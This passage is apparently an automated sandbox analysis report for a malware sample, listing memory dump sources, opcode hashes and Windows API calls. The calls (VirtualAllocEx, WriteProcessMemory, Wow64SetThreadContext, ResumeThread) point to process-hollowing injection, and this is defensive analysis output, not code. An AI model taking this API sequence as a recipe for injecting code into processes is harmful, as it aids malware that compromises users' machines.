                                          • Opcode ID: 96e0974fa96c77b8f5e784af834a4d6915f292f5fa4d83d11861953d99c37f5b
                                          • Instruction ID: 07945c75d5daaabaeaa676b535c0ad8bc0be5e7179a9c50fb9b57034bd5463f4
                                          • Opcode Fuzzy Hash: 96e0974fa96c77b8f5e784af834a4d6915f292f5fa4d83d11861953d99c37f5b
                                          • Instruction Fuzzy Hash: 0D5144B1D00709CFEB14CFAAD648B9EBBF1AF88314F208459E409A7260DBB55984CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CD5A76
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 79e3ffa10256fb829287e5fd85302194be7bdc37c27f4fa3323aedb19863827e
                                          • Instruction ID: 3e26bad7e0dd8601194100e8619a07a080ce361b21173316fdfe9742ff858bd5
                                          • Opcode Fuzzy Hash: 79e3ffa10256fb829287e5fd85302194be7bdc37c27f4fa3323aedb19863827e
                                          • Instruction Fuzzy Hash: 9A916B71D00219DFEF50CF68C841BEDBBB2BF48310F5485A9E908A7280DB759A85CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CD5A76
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00F9AFBE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CD5648
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CD5648
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CD5728
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D6D7
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CD5066
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CD5728
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CD5066
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D6D7
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F9B039,00000800,00000000,00000000), ref: 00F9B24A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F9B039,00000800,00000000,00000000), ref: 00F9B24A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CD5566
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CD5566
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CD95DD
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: ac067eb50c7f28df5e85b2606f76b0ccfdb2e28391cd13a5b3ce4393f967dae7
                                          • Instruction ID: ff9c69c9613d141e7fc38f0355bcf1fcd2f14122ab721384df9b68b9533fb637
                                          • Opcode Fuzzy Hash: ac067eb50c7f28df5e85b2606f76b0ccfdb2e28391cd13a5b3ce4393f967dae7
                                          • Instruction Fuzzy Hash: 481106B98003499FDB50CF99D885BDFBBF8FB48320F108459E915A7210D775A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CD95DD
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 92dbf87dce0ac107df369b1fed0e3350ebdb06cafa999f574fa52c655320afea
                                          • Instruction ID: b26902a384374f46bd69f212fbb4563d35fd6f3c512eb449ac3f8fca927d4584
                                          • Opcode Fuzzy Hash: 92dbf87dce0ac107df369b1fed0e3350ebdb06cafa999f574fa52c655320afea
                                          • Instruction Fuzzy Hash: 0E11F2B58003499FDB50DF9AC885BDEFBF8EB48320F108559E918A7210D3B5AA44CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00F9AFBE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 7f9150615c7553830b5f59aa166e9c74e4df5c342aee7d69b4b31de193f17995
                                          • Instruction ID: 3ffa377e42061d96ef9680c2179d50570ffc68cb099cd5a9c466680f991ecb53
                                          • Opcode Fuzzy Hash: 7f9150615c7553830b5f59aa166e9c74e4df5c342aee7d69b4b31de193f17995
                                          • Instruction Fuzzy Hash: 0F11E0B6C007498FDB10CF9AD444BDEFBF4AF88328F10845AD829A7610D3B9A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f78d5f3c4e737e230721657f336c78e38cdaeb50d59344ab6df609e2875b9de
                                          • Instruction ID: 85846915f652a6c169ef888d96b71ab5d0b6d160ebc8f8ab6e26a2705bdca6f4
                                          • Opcode Fuzzy Hash: 1f78d5f3c4e737e230721657f336c78e38cdaeb50d59344ab6df609e2875b9de
                                          • Instruction Fuzzy Hash: B37119B5E002489FDB08DFAAD855BDDBBB2FB89300F108129E509BB398DB345945CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c9b14f97658c5f7bc681e2443bf123bc40fa6e6be382b8dabb06fa4997c3a26
                                          • Instruction ID: 98150ca368c33dc269f00bfadb09b0115f27d5772eb194d0787d8d463c9af4e7
                                          • Opcode Fuzzy Hash: 3c9b14f97658c5f7bc681e2443bf123bc40fa6e6be382b8dabb06fa4997c3a26
                                          • Instruction Fuzzy Hash: 878190B4E00218DFDB64DFA4D955B9DBBB2FB89300F1080A9E909A7355DB349E82CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47c82590e43193669f2f3b6221ef4558843a54855fb2e7ba399b3b62f892587e
                                          • Instruction ID: 9a49b2a0d37a59d8742bc22b89f5f0a5b4c6bbe8d430e59af1f19e862d96d74b
                                          • Opcode Fuzzy Hash: 47c82590e43193669f2f3b6221ef4558843a54855fb2e7ba399b3b62f892587e
                                          • Instruction Fuzzy Hash: 1451E6B5E0021D9FDB04DFE9D444AEEBBB6FF89301F108029E915AB254D7745A46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57805304f73a64d1570c681cd9038047fbd76fb2b53a3cd84e2c7d78a91784dd
                                          • Instruction ID: d71b7c56b0069e32e5d9d6cd492014622c7a06b93f6cc24fd99f40e08cd0017a
                                          • Opcode Fuzzy Hash: 57805304f73a64d1570c681cd9038047fbd76fb2b53a3cd84e2c7d78a91784dd
                                          • Instruction Fuzzy Hash: B841F174E112189FDB00DFA8D884AEEBBB2FB4C320F149555E800B7355D775A995CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2862f311cbd1cd425c83ea122c2a08d3597b9c060190b2216fb6968f56fd8256
                                          • Instruction ID: d8841b65998e4df802220c32a114d5fc997b92261b1d6aa3d306c1c81a0323e1
                                          • Opcode Fuzzy Hash: 2862f311cbd1cd425c83ea122c2a08d3597b9c060190b2216fb6968f56fd8256
                                          • Instruction Fuzzy Hash: 6541F5B4D05228DFEBA0CF24EC98B99BBB1BB49305F0060E9E50DAB251D7B45AC4CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 25942524c36a990246f544eaec64b1e50599b46f3099543f67ad1c91c0e10d33
                                          • Instruction ID: 7ebc29e24fd1d5244ad856c6266e2deabbb4ae0a94b3ea21b76c295988d00b7e
                                          • Opcode Fuzzy Hash: 25942524c36a990246f544eaec64b1e50599b46f3099543f67ad1c91c0e10d33
                                          • Instruction Fuzzy Hash: B9312A70E00208DFDB44DFA9D544AEEBBB2FF88310F14816AD815AB354DB759981CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145335664.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a1d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3665d9dd0a8051ec7c65890e032436be992e8b603b9c939dcb97075d8dfc88f8
                                          • Instruction ID: 77d12ff34c6c7dd32b3f209deaf25af237cc80ce658c1f239972d0025b007405
                                          • Opcode Fuzzy Hash: 3665d9dd0a8051ec7c65890e032436be992e8b603b9c939dcb97075d8dfc88f8
                                          • Instruction Fuzzy Hash: A7212876504204EFDB04DF14D9C0B66BF65FB98324F24C56DE90A0F256C336E896CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 955a31aa49e83ccb8e71b507bf15e2eca118b7e321dc72f1dca95c829bb2fa79
                                          • Instruction ID: 859ac5e5ca56d728fdaf07594929b5ebb238544077fcff955b9364f03d1f97fe
                                          • Opcode Fuzzy Hash: 955a31aa49e83ccb8e71b507bf15e2eca118b7e321dc72f1dca95c829bb2fa79
                                          • Instruction Fuzzy Hash: 0B3102B5E00209EFDB04DFA9E5446EEBBF1EB8D300F10806AD405B7294EB785A55CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 735aa389fb48b62ba47690967615e33bd54b34fcf01a518f0d75a2b88f9deb0d
                                          • Instruction ID: 1d808f101a40aedcd851f3f44a33c97354bff25fab7d48e010d5d32838aa20a4
                                          • Opcode Fuzzy Hash: 735aa389fb48b62ba47690967615e33bd54b34fcf01a518f0d75a2b88f9deb0d
                                          • Instruction Fuzzy Hash: 0D3116B4E0020DEFDB44DFA9D5456AEBBB2FF88300F108129D416AB355DB785A41CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145412197.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a2d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0c5aab239f327050291b02a3a1a78b2a6bf72aca006b19eaa1167752dc6a152
                                          • Instruction ID: dffab630585eae20a1a5a1e0792c3fc242573c1b01a05503ac1fa886014d4b82
                                          • Opcode Fuzzy Hash: e0c5aab239f327050291b02a3a1a78b2a6bf72aca006b19eaa1167752dc6a152
                                          • Instruction Fuzzy Hash: E721D075604204EFDB04DF18E9C0B26BBA5FB88714F24C57DD94A4F253C77AD846CA62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145412197.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a2d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 541df1278389d9e59b381d7637a0e06be523f0949bf90f660b92aad467aefab2
                                          • Instruction ID: f7d0a9eeff6e25d30d01c7d185380ed8c04331ab108225aba624dc94d529cc05
                                          • Opcode Fuzzy Hash: 541df1278389d9e59b381d7637a0e06be523f0949bf90f660b92aad467aefab2
                                          • Instruction Fuzzy Hash: 49213475504304EFDB04DF18E9C0B26BB61FB84314F20C67DD90A4B697C77AD866CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f555d7877f37be9b4edeca321849f459594cbf0dd85643f6263cfabdeb2c9ca
                                          • Instruction ID: 50496bae8c635f4823a1e6dda82b7888494ba422b82c611988f84724a1c4da8b
                                          • Opcode Fuzzy Hash: 9f555d7877f37be9b4edeca321849f459594cbf0dd85643f6263cfabdeb2c9ca
                                          • Instruction Fuzzy Hash: BD211DB4D0420DEFDB44DFA9E0456AEBBB2BB88300F14C16AD418AB254D7B99981CFD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1254c15921dcb28c5d8b79be75ce8f5961d5e91619ed3a4534e80c2862a9a39
                                          • Instruction ID: 9f0d5648a9ba441e13ccf034ce9131351db7842d9a68627ba7138870e72d450d
                                          • Opcode Fuzzy Hash: a1254c15921dcb28c5d8b79be75ce8f5961d5e91619ed3a4534e80c2862a9a39
                                          • Instruction Fuzzy Hash: 19219E74A01908EFC748DF5AE688999BBF1FF8C310B6280D4D448AB335DB35AE10DB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145335664.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a1d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                          • Instruction ID: c7d1e042e7365ae2975904d22aadd5ca6ca378e8f8f403e5ef76ed65d666afd5
                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                          • Instruction Fuzzy Hash: 3C11E6B6504280DFCB15CF10D5C4B56BF72FB94324F24C6A9D8490B656C33AE896CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145412197.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a2d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction ID: 8cadc733ba8015d225ee3f29ef36ae5ffc349b270d141fb13fae8291f7d5f677
                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction Fuzzy Hash: 15118B7A504284DFCB05CF14E5C4B19BFA1FB84314F24C6A9D8494F657C33AD84ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56f0047de00f937088af9a61c30689df4e8797a01475a8f927e08470a1771789
                                          • Instruction ID: 66d9df9361409cd87f2bf160fbe3e15c2821a2b6d3d3c03f3c2a4c7198342f33
                                          • Opcode Fuzzy Hash: 56f0047de00f937088af9a61c30689df4e8797a01475a8f927e08470a1771789
                                          • Instruction Fuzzy Hash: 3A01D2B5D09208AFDB44EFA5F8056BDBBB9FBC9300F00D155D8089B310DBB84A41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae638c767f515a9c9a35b9ecb7348fb309351e8ab3d33bfb05fcbf21c235698f
                                          • Instruction ID: a38aba053d64789712c2a75d5b9f86c7e616b8925e00ed8f4d6e5fccb031d311
                                          • Opcode Fuzzy Hash: ae638c767f515a9c9a35b9ecb7348fb309351e8ab3d33bfb05fcbf21c235698f
                                          • Instruction Fuzzy Hash: 1D1192B4D04208EFDB44EFA9E4456ADBFF5FB89300F10C5AAD85497345E7B85A42CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0a280ba72194bd2b77da0a3c34689025afe0b5ecd9fbd56ab77ee8145a85a04c
                                          • Instruction ID: 484477ca7e3dc82eea91b35c3a08b481ac010ce57ff33c42a5b211228d7c3212
                                          • Opcode Fuzzy Hash: 0a280ba72194bd2b77da0a3c34689025afe0b5ecd9fbd56ab77ee8145a85a04c
                                          • Instruction Fuzzy Hash: B0115BB4D08209DFDB84CFA9A4452AEBFF1AB89300F1481AAC408AB211D7754A45CFD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
